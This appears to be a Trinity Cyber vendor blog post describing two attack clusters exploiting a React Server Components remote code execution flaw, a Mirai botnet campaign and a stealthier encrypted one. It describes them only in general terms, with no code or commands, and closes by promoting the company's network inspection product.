In December 2025, the disclosure of CVE-2025-55812, widely known as React2Shell, triggered immediate mass exploitation across the internet. The vulnerability allows unauthenticated remote code execution in React Server Components — giving attackers direct control of exposed systems.

Within hours, nation-state actors, botnets, and cybercriminal groups were actively weaponizing it.

Trinity Cyber stopped thousands of React2Shell exploitation attempts in real-time across its Active Network Defense platform. Among them, two distinct attack clusters stood out, revealing how modern threat actors approach the same vulnerability in radically different ways.

Trinity Cyber Blog React2Shell in the Wild How Attackers Weaponize Botnets and Stealthy Attacks Minute Graphic

Together, they offer a clear lesson: attackers don’t just exploit vulnerabilities — they adapt their payloads to defeat traditional security tools.

Why React2Shell Was So Dangerous

React is one of the most widely used JavaScript frameworks on the internet. React2Shell quickly became one of the most critical vulnerabilities of the year because:

  • No authentication required
  • Simple to exploit
  • Internet-facing apps exposed immediately
  • Rapid weaponization by attackers of all skill levels

Much like Log4Shell before it, React2Shell triggered a global race, with defenders rushing to patch while attackers rushed to compromise.

What Trinity Cyber Observed

Over three months, Trinity Cyber analyzed thousands of real-world React2Shell payloads. Instead of treating them individually, analysts grouped attacks by behavior revealing two of the most interesting and opposite exploitation strategies.

Our technical brief provides a comprehensive analysis of both the Teapot and Little Dash clusters and details how Trinity Cyber’s Full Content InspectionTM (FCI) provides coverage for both.

Cluster One: “Teapot” — Mirai at Internet Scale

The Teapot cluster was a classic Mirai botnet campaign — but with a twist.

Mirai operators rapidly adapted React2Shell into their automated exploitation engine, aggressively targeting systems across 12 Linux architectures, including ARM, MIPS, PowerPC, and x86.

What made this campaign unusual was its anti-research tactics.

When analysts attempted to retrieve payloads with unfamiliar user agents, servers responded with HTTP 418 (“I’m a teapot”), a rarely used response code designed to block researchers from further analysis. Only requests mimicking real Mirai binaries successfully retrieved the malware.

Once executed, payloads:

  • Downloaded architecture-specific malware
  • Killed monitoring tools
  • Wiped logs and execution traces
  • Connected to shared command-and-control infrastructure

This was Mirai doing what it does best: fast, automated, and ruthlessly efficient.

Cluster Two: “Little Dash” — Precision Over Volume

In contrast, Little Dash appeared only 45 times across three days — but showed significantly higher sophistication.

These payloads included:

  • Web Application Firewall evasion using Unicode encoding
  • Oversized payloads to bypass filters
  • Multiple decoding layers
  • AES encryption to hide malicious content

Once decrypted, the attack chain:

Trinity Cyber Blog React2Shell in the Wild How Attackers Weaponize Botnets and Stealthy Attacks Once decrypted the attack chain

The design strongly suggests preparation for long-term access — and possibly self-propagating exploitation.

Where Teapot relied on speed and scale, Little Dash relied on stealth and evasion.

Why Detection-Only Security Struggles

Despite their differences, both clusters shared one critical dependency:

The malicious payload had to reach the target system.

Traditional security tools rely heavily on:

  • Known signatures
  • Domain reputation
  • Post-execution telemetry
  • Alert-driven response

When payloads are encrypted, obfuscated, or novel, those controls often fail.

How Trinity Cyber Stopped Both Attacks

Trinity Cyber’s FCI inspects live network traffic before execution — regardless of encryption, payload size, or evasion technique.

Instead of alerting after compromise, FCI:

  • Parses full sessions in real time
  • Identifies malicious behavior
  • Surgically removes malicious content inline

That’s why Trinity Cyber prevented both high-volume Mirai exploitation and stealthy precision attacks without blocking workflows or generating alert fatigue.

Final Takeaway

React2Shell illustrates how modern exploitation unfolds:

  • Some attackers move fast and loud
  • Others move quietly and surgically
  • All depend on payload delivery

If defenders can’t see the full content of network traffic, they can’t stop modern attacks.

See Active Network Defense in Action

Want to see how Trinity Cyber defeats threats like React2Shell before they reach your environment? Schedule a live demo today.